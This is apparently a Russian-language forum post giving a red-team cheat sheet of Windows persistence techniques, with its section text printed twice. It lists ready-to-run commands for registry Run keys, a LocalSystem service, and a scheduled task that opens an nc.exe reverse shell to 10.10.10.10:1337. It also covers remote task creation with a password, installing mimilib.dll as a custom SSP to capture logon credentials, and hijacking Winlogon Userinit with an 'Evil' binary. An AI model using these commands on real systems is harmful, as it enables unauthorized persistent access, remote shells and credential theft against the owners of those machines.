devqp
Специалист
Персистентность — методы сохранения доступа к системе после перезагрузок, смены учётных данных и других прерываний. Рассмотрим техники для административного уровня.
Реестр: автозапуск
Добавление записей в ключи реестра запускает программы при входе пользователя с его уровнем прав:
Службы
Службы запускаются при загрузке ОС с правами SYSTEM. Создание службы:
Планировщик задач
Задачи выполняются при старте системы или по расписанию. Пример создания:
Для удалённого создания:
Кастомный SSP (Security Support Provider)
Внедрение DLL для перехвата учётных данных:
1. Скопировать mimilib.dll в SYSTEM32
2. Добавить в реестр:
3. Проверить:
Учётные данные сохраняются в SYSTEM32\kiwissp.txt.
Контекстное меню Windows
Использование уязвимостей контекстного меню (правый клик) для выполнения кода. Инструмент: ContextMenuHijack (GitHub).
Модификация Userinit
Добавление исполняемого файла в ключ Winlogon:
Реестр: автозапуск
Добавление записей в ключи реестра запускает программы при входе пользователя с его уровнем прав:
Код:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Службы
Службы запускаются при загрузке ОС с правами SYSTEM. Создание службы:
Код:
sc create redteam binpath= "PATH TO BINARY" start="auto" obj="LocalSystem"
Планировщик задач
Задачи выполняются при старте системы или по расписанию. Пример создания:
Код:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 10.10.10.10 1337 -e cmd.exe'
Для удалённого создания:
Код:
schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password
Кастомный SSP (Security Support Provider)
Внедрение DLL для перехвата учётных данных:
1. Скопировать mimilib.dll в SYSTEM32
2. Добавить в реестр:
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
Код:
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
Контекстное меню Windows
Использование уязвимостей контекстного меню (правый клик) для выполнения кода. Инструмент: ContextMenuHijack (GitHub).
Модификация Userinit
Добавление исполняемого файла в ключ Winlogon:
Код:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Some\Evil\Binary.exe","C:\Windows\system32\userinit.exe"